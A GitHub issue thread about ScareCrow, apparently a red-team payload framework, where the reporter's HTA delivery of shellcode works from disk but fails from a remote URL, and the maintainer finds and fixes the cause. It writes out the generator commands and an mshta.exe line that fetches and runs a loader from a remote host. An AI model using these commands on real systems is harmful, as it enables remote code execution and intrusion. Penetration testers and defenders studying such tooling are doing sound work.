HTA delivery failing with remote URL #14
Comments
|
So before I can assit, I need to ask you have two different loaders select in both your examples. I only ask because one is excel which would change the situation. Can you please confirm. |
|
Can you please clarify your question? I tried both methods (excel and control) separetely, and the exhibited behaviour is the same, i.e. the HTA file only executes if it is already located locally. I analysed what's happening in Process Explorer and noticed that control.exe and rundll32.exe do not spawn when calling the file from a remote URL (for control loader). |
|
Okay, I did some testing and it looks like there is some sort of issue with it pulling a large file over via mshta. I am going to do some more testing to address this but it might require a different template for mshta. |
|
Update: I have a working PoC. I am not 100% what it was by it was related to the rebuilding of the .cpl file on disk. I am gonna do some more testing but I should have an update in a day to address this. |
|
Awesome. Would love to hear more about the root cause. |
|
Code pushed in 2.1. Please try it out. |
|
Just tested it out using the Control loader and HTA delivery, and it worked perfectly when calling it with mshta.exe . Thanks a lot! This framework is underrated :) |
|
Sorry for the delay it looks like when the file is being pulled remotely the COM object "ADODB.Stream" times out due to some slowness (probably because mshta uses Internet Explorer Com objects to download content) and loading the base64 encoded payload into memory to then convert. By changing the serialized format and omitting the use of ADODB.Stream it worked. I am glad it worked for you and thank you very much I appreciate the feedback. |
When executing the HTA delivery file (for both control and excel loaders) passing a remote URL where the HTA file is hosted does nothing. On the other hand, if the HTA file is already located on disk, the shellcode is executed successfully.
Monitoring through Process Explorer for control, you can see that control.exe is spawned which then calls rundll32.exe. This never happens when a remote URL is passed instead.
HTA file generated via:
/opt/ScareCrow/ScareCrow -I raw_shell.bin -Loader control -O loader.hta -delivery hta -url <url> -domain <domain>OR
/opt/ScareCrow/ScareCrow -I raw_shell.bin -Loader excel -O loader.hta -delivery hta -url <url> -domain <domain>Control/Excel Loader executed via:
mshta.exe http://HOST/loader.hta--> does not workmshta.exe C:\Windows\Tasks\loader.hta--> worksThe text was updated successfully, but these errors were encountered: